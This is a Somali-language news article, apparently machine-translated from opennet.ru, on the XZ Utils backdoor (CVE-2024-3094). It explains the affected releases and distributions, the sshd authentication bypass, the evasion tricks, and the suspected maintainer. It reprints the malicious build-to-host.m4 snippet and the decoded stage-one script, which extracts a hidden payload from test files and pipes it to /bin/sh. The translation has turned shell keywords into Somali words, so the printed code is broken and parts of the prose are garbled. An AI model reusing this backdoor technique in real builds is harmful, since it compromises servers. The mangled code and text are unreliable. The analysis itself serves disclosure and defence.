Xirmada XZ Utils, oo ay ku jirto maktabadda liblzma iyo utility si loogu shaqeeyo xogta la cufan ee qaabka ".xz", albaabka dambe (CVE-2024-3094) ayaa la aqoonsaday kaas oo u oggolaanaya faragelinta iyo beddelka xogta ay habeeyeen codsiyada la xidhiidha oo leh maktabadda liblzma. Bartilmaameedka ugu weyn ee albaabka dambe waa server-ka OpenSSH, kaas oo qaybinta qaar ay la socdaan maktabadda libsystemd, taas oo iyaduna adeegsata liblzma. Ku xidhida sshd iyo maktabad nugul waxay u ogolaataa weeraryahanadu inay galaan serverka SSH iyada oo aan la xaqiijin.
Albaabka dambe wuxuu ku jiray siidaynta rasmiga ah ee 5.6.0 iyo 5.6.1, ee la daabacay Febraayo 24 iyo Maarso 9, kuwaas oo u suurtagashay in ay galaan qaar ka mid ah qaybinta iyo kaydinta, tusaale ahaan, Gentoo, Arch Linux, Debian sid / unstable, Fedora Rawhide iyo 40-beta, warshad furan SUSE iyo tumbleweed, LibreELEC, Alpine Edge, Solus, NixOS aan degganayn, OpenIndiana, OpenMandriva roing, pkgsrc hadda, Slackware hadda, Imtixaanka Manjaro. Dhammaan isticmaalayaasha xz 5.6.0 iyo 5.6.1 sii daynta waxaa lagula talinayaa inay si degdeg ah dib ugu rogmadaan nooca 5.4.6.
Waxaa ka mid ah arrimaha yareynaya dhibaatada, waxaa la ogaan karaa in nooca liblzma ee leh dhabarka dambe uusan u suurtagelin inuu noqdo qayb ka mid ah siidaynta xasilloon ee qaybinta ballaaran, laakiin waxay saamaysay openSUSE Tumbleweed iyo Fedora 40-beta. Arch Linux iyo Gentoo waxay adeegsadeen nooca zx ee nugul, laakiin uma nuglaadaan weerarka sababtoo ah ma dabaqaan balastar-wargelinta nidaamka si loo furo, taas oo sababta sshd in lagu xidho liblzma. Albaabka dambe wuxuu saameeyaa nidaamyada x86_64 ee ku salaysan Linux kernel iyo maktabadda Glibc C.
Koodhka dhaqaajinta albaabka danbe waxa lagu qariyay macro m4 laga soo bilaabo galka-Build-to-host.m4 oo uu isticmaalo qalabka automake marka la dhisayo. Inta lagu guda jiro shirka, inta lagu guda jiro fulinta hawlgallada qarsoon ee ku salaysan kaydka (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), loo isticmaalo in lagu tijaabiyo saxnaanta hawlgalka, faylka shayga leh kood xaasidnimo ah ayaa la sameeyay, kaas oo lagu daray maktabadda liblzma oo beddeshay macquulka hawlgalka qaar ka mid ah hawlaheeda. Gadaarka-dhaqdhaqaaqa m4 macros ayaa lagu daray kubbadaha la sii daayay, laakiin kuma jirin kaydka Git. Isla mar ahaantaana, kaydka tijaabada xaasidnimada ayaa ku jiray kaydka, i.e. Qofka hirgeliyey albaabka dambe wuxuu heli lahaa labadaba kaydka iyo hababka abuurista sii deynta.
Markaad isticmaalayso liblzma codsiyada, isbeddelada xaasidnimada ah ayaa loo isticmaali karaa in lagu dhex galo ama wax ka beddelo xogta, ama saameeya hawlgalka sshd. Gaar ahaan, koodka xaasidnimada leh wuxuu xumeeyay shaqada RSA_public_decrypt si looga gudbo habka xaqiijinta sshd. Albaabka dambe waxa ka mid ahaa ka ilaalinta ogaanshaha oo isma muujin marka LANG iyo TERM doorsoomayaasha bey'ada la dejiyay (tusaale ahaan, marka hawsha lagu wado terminalka) iyo LD_DEBUG iyo LD_PROFILE doorsoomayaasha deegaanka lama dajin /usr/sbin/sshd faylka la fulin karo . Albaabka danbe waxa kale oo uu lahaa dariiqo lagu ogaanayo fulinta goobaha cilad bixinta.
Gaar ahaan, faylka m4/build-to-host.m4 loo adeegsaday gl_am_configmake=`grep -aErls β#{4}[[:alnum:]]{5}#{4}$β $srcdir/ 2>/dev / null` β¦ gl_[$1]_config='sed \Β»r\n\Β» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_horgale -d 2>/dev/null'
Dhismihii ugu horreeyay, hawlgalka grep wuxuu helay imtixaannada faylka / faylasha / bad-3-corrupt_lzma2.xz, kaas oo, markii la furay, soo saaray qoraalka: ####Hello#### #345U211267$^D330^W [! $(uname) = "Linux"] && ka bax 0 [! $(uname) = "Linux"] && ka bax 0 [! $(uname) = "Linux"] && ka bax 0 [! $(uname) = "Linux"] && ka bax 0 [! $(uname) = "Linux" ] && ka bax 0 eval `grep ^srcdir= config.status` haddii tijaabi -f ../../config.status;ka dibna eval `grep ^srcdir= ../../config. .status` srcdir="../../$srcdir" fi dhoofinta i=Β»((madaxa -c +1024 >/dev/null) && madax -c +2048 && (madaxa -c +1024 >/dev/ null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madax - c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax - c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024 >/ dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && ( madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madaxa -c +2048 && (madaxa -c +1024>/dev/null) && madax -c +2048 && (madaxa -c +1024>/dev/null) && madaxa -c +939)";(xz -dc) $srcdir/tijaabooyin/faylal/good-large_compressed.lzma|eval $i|dabada -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F raw βlzma1 -dc|/bin/sh #####Adduunyada####
Sida ay ugu suurtagashay weeraryahanadu inay galaangal u yeeshaan kaabayaasha mashruuca xz wali si buuxda looma cadeyn. Sidoo kale wali ma cadda tirada isticmaalayaasha iyo mashaariicda loo jabiyay natiijada albaabka dambe. Qoraaga lagu eedeeyay in uu leeyahay albaabka dambe (JiaT75 - Jia Tan), kaas oo dhejiyay kaydyo leh kood xaasidnimo ah oo ku jira kaydka, waxa uu la xidhiidhay horumarinta Fedora oo u diray codsiyo jiidis ah Debian oo la xidhiidha u wareejinta qaybinta laanta xz 5.6.0, mana samayn kicin shaki, tan iyo markii uu ka qaybqaatay xz waxa uu kobcayay labadii sano ee la soo dhaafay waana horumariyaha labaad marka loo eego tirada isbeddelada la sameeyay. Marka laga soo tago mashruuca xz, qoraaga eedaysanaha ee dhabarka ayaa sidoo kale ka qaybqaatay horumarinta xz-java iyo xz xirmooyinka. Waxaa intaa dheer, Jia Tan dhowr maalmood ka hor waxaa lagu daray tirada ilaaliyayaasha mashruuca XZ Embedded ee loo isticmaalo kernel Linux.
Isbeddelka xaasidnimada leh ayaa la ogaaday ka dib markii la falanqeeyay isticmaalka xad dhaafka ah ee CPU iyo khaladaadka uu dhaliyay valgrind markii lagu xiray ssh nidaamyada ku saleysan Debian. Waxaa xusid mudan in xz 5.6.1 siideynta ay ku jiraan isbedelada uu diyaariyay qoraaga eedaysanaha ee dhabarka isagoo ka jawaabaya cabashooyinka ku saabsan gaabiska sshd iyo shilalka kacay ka dib markii loo cusboonaysiiyay nooca zx 5.6.0 ee leh albaabka dambe. Intaa waxaa dheer, sannadkii hore Jia Tan waxay samaysay isbeddelo aan ku habboonayn "-fsanitize=cinwaanka" qaabka kormeerka, taasoo keentay inay naafo noqoto inta lagu jiro tijaabada fuzz.
Source: opennet.ru